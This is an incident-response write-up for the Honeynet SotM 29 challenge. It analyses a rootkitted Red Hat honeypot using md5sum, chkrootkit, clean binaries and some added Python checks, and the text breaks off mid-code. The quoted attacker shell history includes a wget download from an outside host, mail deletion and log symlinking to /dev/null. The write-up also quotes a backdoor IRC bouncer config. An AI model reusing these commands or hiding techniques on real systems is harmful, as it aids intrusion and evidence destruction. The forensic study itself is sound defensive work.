SotM Scan29
Writeup by Dophine V. Britanico
ACKNOWLEDGMENT
To GOD for without his guidance you're not reading this man.
To the Computer Security Community and Honeynet Project.
To all who submit entries here past and future. Keep on submitting.
To my daughters who inspire me.
CONTENTS
iii. LIVE ANALYSIS WEEKEND 1 -2
iv. WEEKEND 3
v. ANSWERS TO SOTM 29 QUESTIONS
vi. ATTACKER SCRIPTS
vii. TRACES
viii. SNIFFER LOGS
On August 10, 2003 a Linux Red Hat 7.2 system was compromised. Your mission is to analyze the compromised system. What makes this challenge unique is that you are to analyze a live system. The image in question was run within VMware. Once compromised, we suspended the image. The challenge to you is to download the suspended image, run it within VMware (you will get a console to the system with root access), and respond to the incident. When responding to the incident, you may do a live analysis of the system, or you can first verify that the system has been compromised and then take it down for a dead analysis (or a combination of both). In either case, you will be expected to explain the impact you had on the evidence. Fortunately, this system was prepared for an incident and MD5 hashes were calculated for all files before the system was deployed. Note: this image was recovered from VMware Workstation 4.0; it will not work in older versions. You can download an evaluation copy.
Download Attempt Failed:
My first and second attempts to download the suspended image of the SOTM 29 challenge failed, and it took me almost a day to figure out why on earth those attempts failed. Using my friend's computer, which is connected via broadband (compared to my lowly dial-up connection, which is not able to digest the stream as fast as I want it), I was able to download the file faster, thereby reducing the economic cost and man hours on my part. But I encountered an error and I don't know if this can be duplicated by others. Using XP OEM (SP1), I found out that IE (with the latest hot fixes) failed to properly reassemble (I don't think this is the right technical term) the streams from the tar.bz2 MIME type. My remedy, manually adding the .bz2 extension on Windows, failed; to make sure, I downloaded it twice to verify but still got the same error. As far as I can see the current connection is OK: it has a packet filtering firewall, there are no trojans as far as I can evaluate, and no malware either. My initial suspicion was that it was part of the challenge and the md5sum hashes were intentionally changed by Project Honeynet to fool us, but twice I downloaded the file completely and when I checked the md5sum it was different. To further confirm that my connection is clean I downloaded a huge ISO file and it all went well, thus leaving the assumption that my connection has something to do with it. Using the bzip2recover utility I manually recovered part of the file. I even inquired with Project Honeynet (Lance), who replied that it had been downloaded 1,500 times, if I recall right, with no error. So my conclusion is that my connection is OK, the other side is OK, therefore IE has something to do with it. Correct me, ppl, if I'm mistaken :-). How did I download it? I installed Linux on one of the computers and on my first attempt, presto! Fast download, Linux identified the .bz2 MIME type extension correctly, and the md5sum is identical to the one from Project Honeynet.
[root@localhost root] md5sum linux-suspended.tar.bz
d95a8c351e048bd7d5596d6fc49b6d72 linux-suspended.tar.bz
The first thing a sane forensic analyst will do when performing live incident response is to duplicate the entire system and catalog it [10][11]. Second, assess how critical the damage is and how crucial the data residing on the compromised system is: whether it is advisable to enter single user mode and/or permanently disconnect the external network for dead analysis without affecting the operation of the entire system; whether those actions might trigger the system to self-destruct if it is booby-trapped; and whether anybody relies on the compromised system for connectivity, in which case it should not be disconnected. If one of the above criteria fails, or depends on another, then the forensic analyst and computer security expert can perform a combination of both: live and dead analysis. The general rule is "the earlier the better", while the data is still fresh.
VMware [1h] preserves the current state of the virtual machine by suspending, saving, and reverting, which satisfies one of the criteria of incident response; duplication of the entire virtual machine can also be easily done using a simple copy, or using dd and netcat if this were a real system. On SOTM 29, here is the step-by-step process I followed.
(1) Before resuming the current state of the compromised virtual machine (VMX), besides the md5sum combination pair, I first backed up the entire VMX by copying it to another folder.
(2) Set up another VMX using vanilla RH 8.0 with host-only networking support and checked whether network traffic can be seen by the host OS.
(3) Installed a packet filtering firewall on the host OS just in case something nasty comes out of the rogue VMX.
(4) Manually edited the VMX configuration file "linux.vmx", changing the following lines so that I can use it on Windows:
ide0:0.fileName = "/dev/cdrom" to ide1:0.fileName = "auto detect"
ide0:0.deviceType = "atapi-cdrom" to ide1:0.deviceType = "cdrom-raw"
(5) Resumed the VMX and, just after the login procedure, saved the current VMX so that reverting would be easier later.
(6) Performed some live neanderthal forensic acrobatics.
iii. LIVE ANALYSIS: WEEKEND 1 - 2
TOOLS: Linux binaries including mount, md5sum, dd, dumpfs, the intruder binaries ls, ps, netstat, ifconfig, md5deep, and chkrootkit [1i].
My initial instinct after seeing the running compromised system was that it has a network sniffer [12] running, from seeing the words "eth0: Promiscuous mode enabled.", a classic signature of a system NIC in promiscuous mode [13]. I also noticed an unusual init process popping up just after authentication, "(swapd)", which is probably a hidden process that listens on a RAW socket (PF_INET, SOCK_PACKET), which the kernel reported to be obsolete. On my system "INIT:" is puking and keeps reminding me that it is respawning too fast, another hint that something is bad, and checking /etc/fstab reveals more interesting information. Remembering that this is not a real system, I was almost tempted to switch into single user mode and see how the system reacts, but having thought that the startup scripts had been compromised and might erase some logs again and make post mortem analysis harder and more time consuming, I preferred to test some binaries that I know are the favorites of almost all rootkits and take a peek at the live system without a clean binary.
First I tested ls and nothing seemed funny (but we assume this one is not the original), traversing different directories and creating invisible directories like "dot space" to see how ls reacts:
[root@localhost root]cd /tmp; mkdir ". "
[root@localhost root]ls -al
total 12
drwxrwxrwt 3 root root 4096 Aug 10 22:18 .
drwxr-xr-x 2 root root 4096 Aug 10 22:18 .
drwxr-xr-x 18 root root 4096 Aug 10 15:54 ..
Clever! So the attacker assumes that if we are looking for a "dot dot space" directory, an inexperienced administrator may ignore it and conclude that the ls binary is in good shape. Again let's try passing some arguments to ls like ls -al, -1, etc. Now when I pass...
[root@localhost root]ls -alh
ls: invalid option -- h
Try `ls --help' for more information.
That certainly tripped it; md5sum and md5deep confirm that it was indeed replaced.
Now checking /etc/fstab to find out why INIT is complaining.
Wow! /etc/fstab automounts /dev/shm as tmpfs, which contains a script that notifies the hacker by email to newprtaceuser@yahoo.com when the honeypot is online, sends the honeypot IP, and is SETUID/SETGID. A legitimate SysAdmin would not do this.
Let's look for hidden files this time using find:
[root@localhost root] find / -xdev -name ".*" -print | more
/var/spool/at.SEQ
/etc/opt/pysbnc/tools/.chk
/etc/skel/.bash_logout
/etc/skel/.bash_profile
/etc/skel/.bashrc
/etc/.pwd.lock
/usr/lib/perl5/5.6.0/i386-linux/.packlist
/usr/share/doc/samba-2.2.1a/examples/VFS/.cvsignore
/usr/share/man/man1/..1.gz
/lib/.x
/lib/.x/.boot
/root/.bash_logout
/root/.Xresources
/root/.bash_profile
/root/.bashrc
/root/.cshrc
/root/.tcshrc
/root/.bash_history
/root/.ssh
/root/.links
/.autofsck
/.bash_history
Hmm! What is ".bash_history" doing in the root directory? There are only two possibilities here: either the system was started in single user mode, or it was left behind after an exploit.
[root@localhost root]cd /; cat .bash_history
uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root // Legitimate Admin wouldn't delete this
ps x
cd /tmp
ls -a
wget izolam.net/ssltop.tar.gz // It modifies httpd.conf
ps x
ps aux | grep apache
kill -9 21510 21511 23829 23292 23302
The intruder also installed psybnc, and poking into the configuration and logs I found another interesting hint.
In psybnc.conf:
PSYBNC.SYSTEM.PORT1=65336
USER1.USER.LOGIN=sic
USER1.USER.USER=_4,1I`m siCk motherfucker siCk_
USER1.USER.PASS==`N`Y1y`T1201'l`C`g
.
..
USER1.SERVERS.SERVER1=mesa.az.us.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY1=#radioactiv
USER1.CHANNELS.ENTRY0=#RedCode
USER2.USER.LOGIN=redcode
USER2.USER.USER=_4,1redCode_8Chicken_
USER2.USER.PASS==`&'X1e'O`t1I1k'8'6
In psybnc.log:
Sun Aug 10 16:02:46 :psyBNC2.3.1-cBtITLdDMSNp started (PID :15119)
Sun Aug 10 16:03:32 :connect from sanido-09.is.pcnet.ro
Sun Aug 10 16:03:32 :New User:sic (wqewqde dedwqere) added by sic
.
..
Sun Aug 10 17:49:47 :User sic logged in.
Sun Aug 10 17:50:39 :New User:redcode (_4,1redCode_8Chicken_) added by sic
Sun Aug 10 17:50:51 :User redcode () has no server added
Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:51:22 :User redcode logged in.
Sun Aug 10 17:51:36 :User redcode () trying mesa.az.us.undernet.org port 6667 ().
Sun Aug 10 17:51:36 :User redcode () connected to mesa.az.us.undernet.org:6667 ()
Sun Aug 10 17:51:42 :User redcode () got disconnected (from mesa.az.us.undernet.org) Reason: Closing Link: killme by mesa.az.us.undernet.org (Sorry, your connection class is full - try again later or try another server)
Sun Aug 10 17:52:06 :User redcode () trying mesa.az.us.undernet.org port 6667 ().
Sun Aug 10 17:52:06 :User redcode () connected to mesa.az.us.undernet.org:6667 ()
Sun Aug 10 18:00:49 :User redcode quitted from sanido-08.is.pcnet.ro)
Changing directory to /lib/.x gave us more interesting information (again). I got some of the configuration scripts of the ssh backdoor and the sniffer. Using strings we got the following information on these files:
cl (ELF) = Die Putze log cleaner [1d]
inst (SCRIPT) = sniffer which is copied to /sbin/init
log (ELF) = SUCKIT LKM [1e] rootkit
sln (ELF) = UPX [1f] packed
mfs = sniffer logs
r_s = SSH initial random seed value
s_h_k = intruder SSH private key
s_h_k.pub = intruder SSH public key
sshd_config = SSHD config file
xopen = SSH
And let's get back to (swapd) before we get lost in haste.
[root@localhost root]cd /
[root@localhost /]find / -name "(swapd)"
Lo and behold! (swapd) is not a standard Linux binary as far as I'm concerned, and it was located in /usr/bin/(swapd); using strings further reveals more intruder activity. My initial assessment from the strings output is that it is a sniffer.
<cut>
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
..
eth0
/usr/lib/libice.log
can't open log
rm %s
.
<snip..>
Another hint for us, so let's look at /usr/lib/libice.log using vi:
Proxyscan.undernet.org => 192.168.179 [23]
Hmm! If we try to decipher this, it is a logged connection from proxyscan.undernet.org to our honeypot on port 23.
Next, since the system a while ago reported that interface "eth0" is in promiscuous mode, logic tells us that ifconfig should report it too.
[root@localhost root]ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8328 errors:109 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:8328
eth0 Link encap:10Mbps Ethernet HWaddr 00:0C:29:89:42:93
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6618588 errors:9788 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:868319
Interrupt:10 Base address:0x10e0
None, so this again confirms what our md5sum hashes showed. Let's see the logs.
[root@localhost root]cd /var/log; ls -al
Notice that files are linked to /dev/null and some files are missing; using vi on secure:
Aug 10 16:04:14 telnet session from 193.109.122.5
And a failed ssh connection from 202.85.165.46 on the same date at 18:58:33.
Using vi on maillog reveals an even more interesting hint that corroborates the logs we found in psybnc: the intruder sending system information to these email addresses.
jijeljijel@yahoo.com
newptraceuser@yahoo.com
skiZophrenia_siCk@yahoo.com
[root@localhost root]cd
[root@localhost root]ls -al .bash_history
w00w00! .bash_history is also a symlink to /dev/null. Indeed the system was compromised; trying ps this time.
[root@localhost root] ps x
PID TTY STAT TIME COMMAND
1 ? S 0:05 init
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SWN 0:00 [ksoftirqd_CPU0]
6 ? SW 0:00 [kreclaimd]
7 ? SW 0:00 [bdflush]
8 ? SW 0:00 [kupdated]
9 ? SW< 0:00 [mdrecoveryd]
17 ? SW 0:05 [kjournald]
92 ? DW 0:00 [khubd]
657 ? S 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
699 ? S 0:00 /usr/sbin/sshd
732 ? S 0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid
759 ? S 0:00 sendmail: accepting connections
778 ? S 0:00 gpm -t ps/2 -m /dev/mouse
820 ? S 0:00 crond
893 1 S 0:00 login -- root
894 2 S 0:00 /sbin/mingetty tty2
895 3 S 0:00 /sbin/mingetty tty3
896 4 S 0:00 /sbin/mingetty tty4
899 5 S 0:00 /sbin/mingetty tty5
900 6 S 0:00 /sbin/mingetty tty6
901 1 S 0:00 -bash
3247 ? S 0:00 syslogd -m 0
3252 ? S 0:00 klogd -2
15119 ? S 0:00 initd
15440 ? S 0:00 CROND
15443 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root
15605 1 R 0:00 ps x
25239 ? S 0:00 /lib/.x/s/xopen -q -p 3128
25241 ? S 0:00 /lib/.x/s/xopen -q -p 3128
25247 ? S 0:00 /lib/.x/s/lsn
Very unusual processes running: 15440, 25239, 25241, 25247. Let's get back to them later.
Now trying netstat:
[root@localhost root] netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED
tcp 0 0 0.0.0.0:65436 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3128 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65336 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2003 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:3049 0.0.0.0:*
Active UNIX domain sockets (including servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 804
unix 2 [ ] DGRAM 924
unix 2 [ ] DGRAM 990
unix 2 [ ] DGRAM 1078
unix 3 [ ] DGRAM 7993
unix 2 [ ] DGRAM 15679
unix 4 [ ] DGRAM 7984 /dev/log
unix 2 [ ACC ] STREAM LISTENING 943 /dev/gpmctl
Active IPX sockets
Proto Recv-Q Send-Q Local Address Foreign Address State
Very unusual ports activated and one connection established, but we are not sure, because we know that netstat is also replaced, like ifconfig and ps.
Let's confirm our initial assessment now, before all things get dirty, by using md5deep, md5sum and chkrootkit, mounting the CD-ROM drive.
[root@localhost root]mount /dev/cdrom /mnt; cd /mnt/ ; cp linux-suspended-md5s.gz md5deep-0.16.tar.gz chkrootkit-0.41.tar.gz /tmp/; cd /tmp/; gzip -d linux-suspended-md5s.gz md5deep-0.16.tar.gz
[root@localhost tmp]md5sum -c linux-suspended-md5s | grep FAILED > failed; vi failed
/var/lib/slocate/slocate.db: FAILED
/var/lib/random-seed: FAILED
/var/lib/logrotate.status: FAILED
/var/log/messages: FAILED
/var/log/lastlog: FAILED open or read
/var/log/secure: FAILED
/var/log/maillog: FAILED
/var/log/wtmp: FAILED
/var/log/sa/sa14: FAILED open or read
/var/log/sa/sa15: FAILED open or read
/var/log/sa/sar14: FAILED open or read
/var/log/sa/sa16: FAILED open or read
/var/log/sa/sar15: FAILED open or read
/var/log/sa/sa06: FAILED open or read
/var/log/samba/log.smbd: FAILED open or read
/var/log/samba/smbd.log: FAILED open or read
/var/log/samba/log.nmbd: FAILED open or read
/var/log/samba/localhost.log: FAILED open or read
/var/log/xferlog: FAILED open or read
/var/log/httpd/error_log: FAILED open or read
/var/log/httpd/ssl_engine_log: FAILED open or read
/var/log/httpd/access_log: FAILED open or read
/var/log/httpd/ssl_request_log: FAILED open or read
/var/log/httpd/access_log.1: FAILED open or read
/var/log/httpd/error_log.1: FAILED open or read
/var/log/dmesg: FAILED
/var/log/cron: FAILED
/var/log/boot.log: FAILED
/var/log/rpmpkgs: FAILED open or read
/var/cache/man/whatis: FAILED
/var/cache/samba/smbd.pid: FAILED
/var/cache/samba/connections.tdb: FAILED
/var/cache/samba/nmbd.pid: FAILED
/var/run/utmp: FAILED
/var/run/runlevel.dir: FAILED
/var/run/syslogd.pid: FAILED
/var/run/klogd.pid: FAILED
/var/run/apmd.pid: FAILED
/var/run/sshd.pid: FAILED
/var/run/sendmail.pid: FAILED
/var/run/gpm.pid: FAILED
/var/run/crond.pid: FAILED
/var/run/ftp.pids-all: FAILED open or read
/var/run/ftp.rips-all: FAILED open or read
/var/spool/anacron/cron.daily: FAILED
/var/spool/anacron/cron.weekly: FAILED
/tmp/root.md5: FAILED open or read
/etc/mtab: FAILED
/etc/passwd: FAILED
/etc/rc.d/init.d/functions: FAILED
/etc/rc.d/rc.sysinit: FAILED
/etc/mail/statistics: FAILED
/etc/aliases.db: FAILED
/etc/adjtime: FAILED
/etc/samba/secrets.tdb: FAILED
/etc/httpd/conf/httpd.conf: FAILED
/etc/shadow: FAILED
/usr/bin/top: FAILED
/bin/netstat: FAILED
/bin/ls: FAILED
/bin/ps: FAILED
/sbin/ifconfig: FAILED
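As an added example (mine, not from the writeup or the Honeynet tools), the md5sum -c step above in script form: it parses a manifest of "<md5>  <path>" lines, reports each entry the way md5sum -c does, and then separates failures in files that change on any running system from failures in binaries that should never change. The sample tree and manifest it builds are constructed, not taken from the image.

```python
"""Verify a live system against a pre-deployment md5sum manifest and
triage the failures (added example; not part of the original writeup)."""
import hashlib
import os
import tempfile

# Paths that legitimately change while the system runs. A FAILED there is
# noise unless the file has been turned into a symlink (the ln -s /dev/null
# trick seen in /var/log and /root/.bash_history).
VOLATILE_PREFIXES = ("/var/log/", "/var/run/", "/var/cache/", "/var/lib/",
                     "/var/spool/", "/tmp/", "/etc/mtab", "/etc/adjtime")


def parse_manifest(text):
    """Parse md5sum output lines ("<hex>  <path>") into (hex, path) pairs."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, path = line.partition("  ")
        entries.append((digest.lower(), path.lstrip("*")))  # '*' = binary mode
    return entries


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(entries, root="/"):
    """Rehash every manifest entry under `root`; statuses follow md5sum -c."""
    results = {}
    for digest, path in entries:
        real = os.path.join(root, path.lstrip("/"))
        try:
            results[path] = "OK" if md5_of(real) == digest else "FAILED"
        except OSError:
            results[path] = "FAILED open or read"
    return results


def triage(results, root="/"):
    """Split non-OK entries into (suspicious, volatile), both sorted."""
    suspicious, volatile = [], []
    for path, status in sorted(results.items()):
        if status == "OK":
            continue
        real = os.path.join(root, path.lstrip("/"))
        if path.startswith(VOLATILE_PREFIXES) and not os.path.islink(real):
            volatile.append(path)
        else:
            suspicious.append(path)
    return suspicious, volatile


def build_sample_tree():
    """Constructed sample: a throwaway root with a baseline manifest, then
    the kinds of change the writeup found. Returns (root, manifest_text)."""
    root = tempfile.mkdtemp(prefix="sotm29-")
    baseline = {
        "/bin/ls": b"original ls binary",
        "/sbin/ifconfig": b"original ifconfig binary",
        "/var/log/messages": b"Aug  9 15:54 localhost kernel: boot\n",
        "/var/log/secure": b"Aug  9 15:55 localhost sshd: started\n",
        "/var/log/lastlog": b"lastlog records",
    }
    lines = []
    for path, data in baseline.items():
        real = os.path.join(root, path.lstrip("/"))
        os.makedirs(os.path.dirname(real), exist_ok=True)
        with open(real, "wb") as fh:
            fh.write(data)
        lines.append("%s  %s" % (hashlib.md5(data).hexdigest(), path))
    # Post-compromise changes modelled on the findings above:
    with open(os.path.join(root, "bin/ls"), "wb") as fh:
        fh.write(b"trojaned ls binary")                    # replaced binary
    devnull = os.path.join(root, "dev/null")                # stand-in for /dev/null
    os.makedirs(os.path.dirname(devnull), exist_ok=True)
    open(devnull, "wb").close()
    messages = os.path.join(root, "var/log/messages")
    os.remove(messages)
    os.symlink(devnull, messages)                           # ln -sf /dev/null
    with open(os.path.join(root, "var/log/secure"), "ab") as fh:
        fh.write(b"Aug 10 16:04:14 localhost telnetd: connect\n")  # normal growth
    os.remove(os.path.join(root, "var/log/lastlog"))        # deleted log
    return root, "\n".join(lines) + "\n"


if __name__ == "__main__":
    root, manifest = build_sample_tree()
    results = verify(parse_manifest(manifest), root)
    suspicious, volatile = triage(results, root)
    for path in suspicious:
        print("SUSPICIOUS %-20s %s" % (results[path], path))
    for path in volatile:
        print("volatile   %-20s %s" % (results[path], path))
```

On the sample tree the replaced /bin/ls and the /var/log/messages symlink come out as suspicious, while the grown secure log and the deleted lastlog are reported as expected volatility.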
Running chkrootkit [1K] also detects LKM rootkits.
[root@localhost tmp]./chkrootkit
ROOTDIR is '/'
<cut>
.
..
Checking 'ifconfig' ... INFECTED
Checking 'ls' ... INFECTED
Checking 'netstat' ... INFECTED
Checking 'ps' ... INFECTED
Checking 'top' ... INFECTED
.
<snip>
..
Searching for sniffer's logs, it may take a while... nothing found :-(
.
..
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/5.6.0/i386-linux/.packlist /lib/.x/ /lib/.x/.boot
.
..
Searching for anomalies in shell history files... Warning: '//root/.bash_history' is linked to another file ('ln -s /dev/null /root/bash_history')
Checking 'bindshell'... INFECTED (PORTS: 3049)
Checking 'lkm'... You have 3 process hidden for ps command
Warning: Possible LKM Trojan installed
Checking 'sniffer'...
eth0 is PROMISC
chkrootkit also confirms the previous assessment.
iv. WEEKEND 3
Restoring again from my backup and using find, I was also able to locate some of the original binaries in the /usr/lib/libshtift/ directory.
[root@localhost root]/usr/lib/libshtift/ps -xuw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 1424 528 ? S Aug09 0:05 init
root 2 0.0 0.0 0 0 ? SW Aug09 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Aug09 0:00 [kapm-idled]
root 4 0.0 0.0 0 0 ? SWN Aug09 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Aug09 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW Aug09 0:00 [kreclaimd]
root 7 0.0 0.0 0 0 ? SW Aug09 0:00 [bdflush]
root 8 0.0 0.0 0 0 ? SW Aug09 0:00 [kupdated]
root 9 0.0 0.0 0 0 ? SW< Aug09 0:00 [mdrecoveryd]
root 17 0.0 0.0 0 0 ? SW Aug09 0:06 [kjournald]
root 92 0.0 0.0 0 0 ? DW Aug09 0:00 [khubd]
root 657 0.0 0.5 1396 524 ? S Aug09 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scripts/apmscript
root 699 0.0 1.3 2676 1272 ? S Aug09 0:00 /usr/sbin/sshd
root 732 0.0 1.0 2264 956 ? S Aug09 0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid
root 759 0.0 2.1 5296 1984 ? S Aug09 0:00 sendmail: accepting connections
root 778 0.0 0.5 1440 496 ? S Aug09 0:00 gpm -t ps/2 -m /dev/mouse
root 820 0.0 0.6 1584 660 ? S Aug09 0:00 crond
root 893 0.0 1.1 2320 1076 tty1 S Aug09 0:00 login -- root
root 894 0.0 0.4 1384 448 tty2 S Aug09 0:00 /sbin/mingetty tty2
root 895 0.0 0.4 1384 448 tty3 S Aug09 0:00 /sbin/mingetty tty3
root 896 0.0 0.4 1384 448 tty4 S Aug09 0:00 /sbin/mingetty tty4
root 899 0.0 0.4 1384 448 tty5 S Aug09 0:00 /sbin/mingetty tty5
root 900 0.0 0.4 1384 448 tty6 S Aug09 0:00 /sbin/mingetty tty6
root 901 0.0 1.3 2452 1296 tty1 S Aug09 0:00 -bash
root 3137 0.0 0.7 1900 716 ? S 13:33 0:03 smbd -D
root 3153 0.0 0.7 1664 704 ? S 13:33 0:00 (swapd)
root 3247 0.0 0.6 1472 592 ? S 13:33 0:00 syslogd -m 0
root 3252 0.0 1.1 1984 1096 ? S 13:33 0:00 klogd -2
root 25239 0.0 0.3 1880 336 ? S 15:32 0:00 /lib/.x/s/xopen -q -p 3128
root 25241 0.0 0.7 1888 672 ? S 15:32 0:00 /lib/.x/s/xopen -q -p 3128
root 25247 0.0 0.7 1668 732 ? S 15:32 0:00 /lib/.x/s/lsn
root 15119 0.0 1.3 2296 1240 ? S 16:02 0:00 initd
root 15607 0.0 0.7 2636 728 tty1 R 20:34 0:00 /usr/lib/libshtift/ps -xuw
[root@localhost root]/usr/lib/libshtift/netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2003 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65336 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3128 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65436 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED
tcp 0 34 192.168.1.79:1149 64.62.96.42:6667 FIN_WAIT1
tcp 0 9 192.168.1.79:1146 199.184.165.133:6667 ESTABLISHED
udp 0 288 192.168.1.79:1030 192.168.1.1:53 ESTABLISHED
udp 0 0 0.0.0.0:3049 0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 943 /dev/gpmctl
unix 4 [ ] DGRAM 7984 /dev/log
unix 2 [ ] DGRAM 15679
unix 2 [ ] DGRAM 7993
unix 2 [ ] DGRAM 1078
unix 2 [ ] DGRAM 990
unix 2 [ ] DGRAM 924
unix 2 [ ] DGRAM 804
Active IPX sockets
Proto Recv-Q Send-Q Local Address Foreign Address State
[root@localhost root]/usr/lib/libshtift/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:89:42:93
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:9788 errors:0 dropped:0 overruns:0 frame:0
TX packets:9100 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
RX bytes:6618588 (6.3 Mb) TX bytes:868823 (848.4 Kb)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:113 errors:0 dropped:0 overruns:0 frame:0
TX packets:113 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
RX bytes:8684 (8.4 Kb) TX bytes:8684 (8.4 Kb)
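To make the "hidden for ps command" check concrete, here is an added example (mine, not from the writeup or from chkrootkit) that diffs the trojaned `ps x` listing against the clean `/usr/lib/libshtift/ps -xuw` listing above. The two listings are trimmed to the lines that matter, and `proc_view` is my own helper for taking the trusted side from /proc on a live host.

```python
"""Cross-view diff of two ps listings to expose processes a trojaned ps
hides (added example; not part of the original writeup)."""
import os

# Trojaned `ps x` output from above, trimmed to the relevant lines.
TROJANED_PS = """\
PID TTY STAT TIME COMMAND
1 ? S 0:05 init
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SWN 0:00 [ksoftirqd_CPU0]
6 ? SW 0:00 [kreclaimd]
699 ? S 0:00 /usr/sbin/sshd
901 1 S 0:00 -bash
3247 ? S 0:00 syslogd -m 0
15119 ? S 0:00 initd
15440 ? S 0:00 CROND
15443 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root
15605 1 R 0:00 ps x
25239 ? S 0:00 /lib/.x/s/xopen -q -p 3128
25247 ? S 0:00 /lib/.x/s/lsn
"""

# Clean `/usr/lib/libshtift/ps -xuw` output from above, trimmed likewise.
CLEAN_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 1424 528 ? S Aug09 0:05 init
root 2 0.0 0.0 0 0 ? SW Aug09 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Aug09 0:00 [kapm-idled]
root 4 0.0 0.0 0 0 ? SWN Aug09 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Aug09 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW Aug09 0:00 [kreclaimd]
root 699 0.0 1.3 2676 1272 ? S Aug09 0:00 /usr/sbin/sshd
root 901 0.0 1.3 2452 1296 tty1 S Aug09 0:00 -bash
root 3137 0.0 0.7 1900 716 ? S 13:33 0:03 smbd -D
root 3153 0.0 0.7 1664 704 ? S 13:33 0:00 (swapd)
root 3247 0.0 0.6 1472 592 ? S 13:33 0:00 syslogd -m 0
root 25239 0.0 0.3 1880 336 ? S 15:32 0:00 /lib/.x/s/xopen -q -p 3128
root 25247 0.0 0.7 1668 732 ? S 15:32 0:00 /lib/.x/s/lsn
root 15119 0.0 1.3 2296 1240 ? S 16:02 0:00 initd
root 15607 0.0 0.7 2636 728 tty1 R 20:34 0:00 /usr/lib/libshtift/ps -xuw
"""


def parse_ps(text):
    """Map PID -> command for any ps listing: the header row says which
    columns hold PID and COMMAND, so `ps x` and `ps -xuw` both parse."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = lines[0].split()
    pid_col, cmd_col = header.index("PID"), header.index("COMMAND")
    procs = {}
    for line in lines[1:]:
        fields = line.split(None, cmd_col)   # keep the command's own spaces
        if len(fields) > cmd_col:
            procs[int(fields[pid_col])] = fields[cmd_col]
    return procs


def proc_view():
    """Trusted view on a live Linux host: read /proc directly. A kernel
    rootkit (SucKIT, adore) can filter /proc as well, so the strongest
    trusted view is a clean binary or a snapshot taken from outside."""
    view = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                with open("/proc/%s/cmdline" % name, "rb") as fh:
                    raw = fh.read().replace(b"\0", b" ")
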